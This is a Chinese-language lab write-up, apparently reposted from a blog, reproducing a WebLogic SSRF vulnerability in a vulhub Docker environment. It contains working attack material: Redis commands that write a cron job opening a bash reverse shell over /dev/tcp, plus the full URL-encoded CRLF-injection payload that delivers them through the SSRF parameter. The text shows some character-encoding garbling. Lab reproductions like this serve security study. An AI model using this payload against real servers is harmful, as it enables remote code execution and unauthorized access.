weblogic ssrf漏洞复现
采用的虛擬機(jī)環(huán)境為ubuntu16.04,在虛擬機(jī)上搭建好docker環(huán)境。采用的vulhub來(lái)進(jìn)行復(fù)現(xiàn)。
使用git來(lái)下載,命令為git clone https://github.com/vulhub/vulhub.git
進(jìn)入ssrf漏洞中,
cd /vulhub/weblogic/ssrf
創(chuàng)建漏洞環(huán)境
docker-compose up -d
查看容器
docker ps
虛擬機(jī)地址為192.168.6.136,訪問(wèn)http://192.168.6.136:7001/uddiexplorer/SearchPublicRegistries.jsp
成功創(chuàng)建漏洞環(huán)境。
ssrf漏洞測(cè)試
打開代理工具攔截http請(qǐng)求包
可以看到參數(shù)中存在一個(gè)網(wǎng)址,將參數(shù)改為http://192.168.6.136:7001
再訪問(wèn)一個(gè)不存在的端口
從兩次不同的http請(qǐng)求包結(jié)果中可知,weblogic中存在這ssrf漏洞。
查看weblogic容器的地址
docker inspect 642ac3b75ae8
同理 docker inspect fe0822abff42
注入HTTP頭,利用Redis的反彈shell
通過(guò)SSRF探測(cè)內(nèi)網(wǎng)中的Redis的服務(wù)器
想redis服務(wù)器發(fā)送命令
set 1 “\n\n\n\n* * * * * root bash -i >& /dev/tcp/監(jiān)聽(tīng)ip/port 0>&1\n\n\n\n”
config set dir /etc/
config set dbfilename crontab
save
利用回車換行將三條命令連接,換行符號(hào)的url編碼為%od%oa,注入的代碼為
test%0D%0A%0D%0Aset%201%20%22%5Cn%5Cn%5Cn%5Cn*%20*%20*%20*%20*%20root%20bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F172.19.0.1%2F21%200%3E%261%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0D%0A%0D%0Aaaa
在虛擬機(jī)中監(jiān)聽(tīng),容器的網(wǎng)關(guān)為172.19.0.1,即為虛擬機(jī)的地址。
發(fā)包
成功得到shell。
到此,漏洞成功復(fù)現(xiàn)。
總結(jié)
以上是生活随笔為你收集整理的weblogic ssrf漏洞复现的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問(wèn)題。
- 上一篇: weblogic(CVE-2018-26
- 下一篇: DnsLog盲注